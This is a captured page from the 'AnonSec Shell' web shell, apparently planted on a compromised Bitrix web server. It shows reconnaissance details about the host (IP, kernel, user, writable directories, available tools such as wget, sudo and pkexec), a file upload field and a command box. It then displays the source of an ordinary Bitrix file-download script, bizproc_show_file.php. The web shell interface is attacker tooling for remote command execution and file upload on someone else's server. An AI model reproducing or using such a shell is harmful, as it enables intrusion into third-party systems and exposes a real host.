AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 18.227.102.20
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/tools/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/bitrix/www/bitrix/tools/bizproc_show_file.php
<?
define("NOT_CHECK_PERMISSIONS", true);
define("EXTRANET_NO_REDIRECT", true);
define("STOP_STATISTICS", true);
define("NO_KEEP_STATISTIC", "Y");
define("NO_AGENT_STATISTIC","Y");
define("DisableEventsCheck", true);
define('BX_SECURITY_SESSION_READONLY', true);

require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");

/**
 * @global CUser $USER
 */

if(!CModule::IncludeModule("bizproc"))
	die();

if (!$USER->IsAuthorized())
	die();

$fileName = preg_replace("/[^A-Za-z0-9_.-]+/i", "", trim($_REQUEST["f"]));
$fileNameHash = isset($_REQUEST['hash']) ? preg_replace("/[^A-Za-z0-9_.-]+/i", "", trim($_REQUEST["hash"])) : '';
$fileId = intval($_REQUEST["i"]);
$fileAction = (isset($_REQUEST["act"]) && $_REQUEST["act"] == "v" ? "view" : "download");
$filePathHash = trim($_REQUEST["h"]);

if ($fileId <= 0 || $fileName == '' && $fileNameHash == '')
	die("Error1");

$bpId = !empty($_REQUEST['bp_id']) ? (int)$_REQUEST['bp_id'] : 0;
$iblockId = !empty($_REQUEST['iblock_id']) ? (int)$_REQUEST['iblock_id'] : 0;

$options = array('cache_time' => 0);
if ($fileAction == "download")
{
	$options["force_download"] = true;
}

if ($bpId > 0 && $iblockId > 0 && $fileName !== '')
{
	$fields = CBPVirtualDocument::GetDocumentFields("type_".$iblockId);
	if (isset($fields[$fileName]) && $fields[$fileName]["BaseType"] == "file")
	{
		list($dbRecordsList, $dbRecordsList1) = CBPVirtualDocument::GetList(
			array(),
			array("ID" => $bpId, "IBLOCK_ID" => $iblockId, "CHECK_BP_VIRTUAL_PERMISSIONS" => "read"),
			false,
			false,
			array($fileName)
		);
		$row = $dbRecordsList->fetch();
		if (!$row)
			die("Error: BP not found");
		$files = (array)$row[$fileName];
		$key = array_search($fileId, $files);
		if ($key !== false)
		{
			set_time_limit(0);
			CFile::ViewByUser($files[$key], $options);
		}
		else
			die("Error: File not found");
	}
	die();
}
$arImg = CFile::GetFileArray($fileId);
if (!$arImg)
	die("Error2: File not found");

if ($fileNameHash)
{
	$rawName = $fileNameHash;
	$checkName = md5($arImg["FILE_NAME"]);
}
else
{
	$rawName = str_replace(' ', '+', trim($_REQUEST["f"]));
	$checkName = str_replace(' ', '+', trim($arImg["FILE_NAME"]));
}

if (strcmp($checkName, $rawName) !== 0)
{
	//mantis http://jabber.bx/view.php?id=62749
	//IE send no-encoded GET params in cp1251 on utf-8 site
	$rawName = $GLOBALS['APPLICATION']->ConvertCharSet($rawName, 'cp1251', 'utf8');
	if (strcmp($checkName, $rawName) !== 0)
		die("Error3");
}

if ($arImg["SUBDIR"] == '')
	die("Error4");

if (mb_substr($arImg["SUBDIR"], 0, mb_strlen("bizproc_wf/")) != "bizproc_wf/"
	&& ($filePathHash == '' || $filePathHash != md5($arImg["SUBDIR"])))
	die("Error5");

set_time_limit(0);

CFile::ViewByUser($arImg, $options);
\Bitrix\Main\Application::getInstance()->end();

Anon7 - 2022
AnonSec Team